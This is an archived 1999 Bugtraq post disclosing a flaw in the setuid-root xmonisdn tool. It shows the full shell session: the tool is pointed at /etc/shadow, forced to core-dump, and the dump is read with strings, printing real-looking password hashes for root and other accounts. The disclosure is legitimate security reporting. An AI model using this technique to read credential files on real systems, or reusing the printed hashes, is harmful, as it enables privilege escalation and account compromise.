[12279] in bugtraq

home help back first fref pref prev next nref lref last post

xmonisdn (isdn4k-utils/Linux) bug report

daemon@ATHENA.MIT.EDU (Ron van Daal)
Tue Oct 19 16:09:42 1999

Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id:  <Pine.LNX.4.10.9910190152540.13164-100000@server.syntonic.net>
Date:         Tue, 19 Oct 1999 02:44:04 +0200
Reply-To: Ron van Daal <ronvdaal@SYNTONIC.NET>
From: Ron van Daal <ronvdaal@SYNTONIC.NET>
X-To:         BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM

Hello,

While playing with xmonisdn (included in the isdn4k-utils package),
I discovered a little bug. I didn't find anything regarding xmonisdn
in the Bugtraq archives, so here's a quick post.

I'm wondering if other xmonisdn users can reproduce this exploit.
(Tested on my workstation, which is running Red Hat Linux 6.0)

[syntonix@damien bin]# pwd; ls -al xmonisdn
/usr/bin
-rwsr-xr-x   1 root     root        13528 Mar  4  1998 xmonisdn
[syntonix@damien bin]# xmonisdn -file /etc/shadow
Warning: Cannot convert string "netactive" to type Pixmap
Warning: Cannot convert string "netactiveout" to type Pixmap
Warning: Cannot convert string "netwaiting" to type Pixmap
Warning: Cannot convert string "netinactive" to type Pixmap
Warning: Cannot convert string "netstart" to type Pixmap
Warning: Cannot convert string "netstop" to type Pixmap

[1]+  Stopped                 xmonisdn -file /etc/shadow
[syntonix@damien bin]# bg
[1]+ xmonisdn -file /etc/shadow &
[syntonix@damien bin]# killall -8 xmonisdn
[1]+  Floating point exception(core dumped) xmonisdn -file /etc/shadow
[syntonix@damien bin]# strings core|less

<snip>
/lib/ld-linux.so.2
root:$1$Fijz9O0n$ku/VSK.h6cbTV5oueAAwz/:10883:0:99999:7:-1:-1:134538500
bin:*:10878:0:99999:7:::
daemon:*:10878:0:99999:7:::
adm:*:10878:0:99999:7:::
lp:*:10878:0:99999:7:::
sync:*:10878:0:99999:7:::
shutdown:*:10878:0:99999:7:::
halt:*:10878:0:99999:7:::
mail:*:10878:0:99999:7:::
news:*:10878:0:99999:7:::
uucp:*:10878:0:99999:7:::
operator:*:10878:0:99999:7:::
games:*:10878:0:99999:7:::
gopher:*:10878:0:99999:7:::
ftp:*:10878:0:99999:7:::
nobody:*:10878:0:99999:7:::
xfs:!!:10878:0:99999:7:::
ronvdaal:$1$Dc92cqLj$V/HSANaVuwCMxGjFfZC/T0:10883:0:99999:7:-1:-1:134538492
syntonix:$1$h3yIM.h/$JjBLYPvb4Zcjv1tb.21Uw/:10883:0:99999:7:-1:-1:134538484
<snip>

--
Ron van Daal          | Syntonic Internet | tel. +31(0)46-4230738
ronvdaal@syntonic.net | www.syntonic.net  | fax. +31(0)46-4230739
home help back first fref pref prev next nref lref last post